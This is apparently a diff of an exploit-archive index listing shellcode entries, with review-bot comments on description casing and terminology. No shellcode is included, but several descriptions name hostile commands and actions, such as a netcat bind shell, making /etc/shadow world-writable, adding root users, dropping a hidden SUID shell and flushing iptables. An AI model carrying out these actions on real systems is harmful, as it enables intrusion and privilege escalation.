13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
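Review bot: 13389 is retitled "Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink)", but the two sibling entries from the same author on the next lines, 13390 "eject cd-rom (follows /dev/cdrom symlink) + exit()" and 13391 "eject/close cd-rom loop (follows /dev/cdrom symlink)", are left in lowercase inside the same hunk. Either all three get the new casing or none should, otherwise the column ends up less uniform than before the change.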
@ -15867,16 +15868,16 @@ id,file,description,date,author,platform,type,port
13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0
13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0
13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0
13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0
13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0
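Review bot: 13428 and 13429 replace "encrypt"/"ENCRYPT" with "Anti-IDS", which swaps the description of the technique (an encoded payload) for its purpose, and it is inconsistent with 13456 in the next hunk, where "xor encrypted" becomes "(XOR Encoded)". Suggest following the 13456 convention, e.g. "Add User (t00r) (Encoded) Shellcode (116 bytes)", so that encoded and plain variants can be told apart from the description alone. Adding "/etc/shadow" to 13429 is a good fix on its own.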
@ -15897,18 +15898,18 @@ id,file,description,date,author,platform,type,port
13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0
13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0
13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0
13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0
13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0
13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0
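Review bot: 13455 "execve /bin/sh encrypted" becomes "execve /bin/sh Anti-IDS" while, on the very next line, 13456 "execve /bin/sh xor encrypted" becomes "execve /bin/sh (XOR Encoded)"; two entries that differed only by the encoding now use two different vocabularies for the same property. Apply one convention to both, and to 13428/13429 in the previous hunk.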
@ -16058,8 +16059,8 @@ id,file,description,date,author,platform,type,port
13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0
13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0
13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0 13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0
13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0
13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
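Review bot: 13731 and 13732 get "Hard / Unclean Reboot", but the context line 13743 in the same hunk keeps the ungrammatical "give all user root access when execute /bin/sh". If the hunk is already normalizing gunslinger_'s entries, "Give All Users Root Access When Executing /bin/sh" should go in with it.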
@ -16080,13 +16081,13 @@ id,file,description,date,author,platform,type,port
14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14218,platforms/linux/shellcode/14218.c,"Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP / 7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP / 7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0
14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14235,platforms/linux/shellcode/14235.c,"Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0
14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14276,platforms/linux/shellcode/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0
14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0
14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
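Review bot: the new 14276 description "Find All Writeable Folder In FileSystem" fixes the casing but not the grammar; "Find All Writeable Folders In Filesystem" reads correctly, and "Filesystem" matches ordinary usage rather than the camel-cased form. The 14235 change to "Bind Shell (nc -lp 31337 -e /bin//sh)" is an improvement; consider also carrying the port in the same "31337/TCP" form used by 14332 so the bind-shell entries sort and search alike.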
@ -16130,8 +16131,8 @@ id,file,description,date,author,platform,type,port
18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0
18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0
18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0
18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
@ -16141,9 +16142,9 @@ id,file,description,date,author,platform,type,port
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0
40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0
24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0
40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
@ -16158,7 +16159,7 @@ id,file,description,date,author,platform,type,port
34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
